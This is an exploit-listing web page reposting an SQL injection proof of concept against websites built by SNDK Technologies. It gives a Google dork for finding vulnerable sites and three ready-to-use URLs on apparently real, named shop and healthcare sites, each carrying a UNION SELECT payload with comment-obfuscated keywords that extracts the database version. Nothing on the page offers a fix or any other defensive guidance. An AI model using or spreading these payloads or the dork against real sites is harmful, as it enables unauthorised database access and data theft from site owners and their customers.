Advertisement






SNDK Technologies - Sql Injection Vulnerability

CVE Category Price Severity
CWE-89 $300 High
Author Risk Exploitation Type Date
Unknown Critical Remote 2023-08-12
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023080054

Below is a copy:

SNDK Technologies - Sql Injection Vulnerability
*********************************************************
#Exploit Title: SNDK Technologies - Sql Injection Vulnerability
#Date: 2023-08-12
#Exploit Author: Behrouz Mansoori
#Google Dork: "Designed by SNDK Technologies Pvt. Ltd."
#Category:webapps
#Tested On: Mac, Firefox
Proof of Concept:
### Demo :
https://www.thecottonish.com/shop.php?id=-13%27%20/*!12345union*/+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--+

https://silverjewelryandgems.com/shop.php?id=-1273%27%20/*!12345union*/+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--+

https://www.vetoxhealthcare.com/category.php?id=-4%27%20/*!12345union*/%20select%201,2,3,version(),5,6,7,8,9,10--+

*********************************************************
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: [email protected]
*********************************************************

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.